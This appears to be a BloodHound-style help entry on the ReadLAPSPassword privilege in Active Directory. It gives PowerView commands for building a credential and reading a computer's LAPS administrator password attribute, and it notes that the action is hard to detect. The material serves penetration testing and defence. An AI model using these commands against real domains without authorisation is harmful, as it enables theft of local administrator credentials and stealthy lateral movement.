This privilege allows you to read the LAPS password from a computer
Abuse Info
You may need to authenticate to the Domain Controller as the user with full control over the target user if you are not running a process as that user. To do this in conjunction with Get-DomainObject, first create a PSCredential object (these examples comes from the PowerView help documentation):
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)
Then, use Get-DomainObject, optionally specifying $Cred if you are not already running a process as the user with full control over the target user.
Get-DomainObject -Credential $Cred -Identity windows10 -Properties "ms-mcs-AdmPwd",name
Opsec Considerations
Reading properties from LDAP is extremely low risk, and can only be found using monitoring of LDAP queries.
References
Updated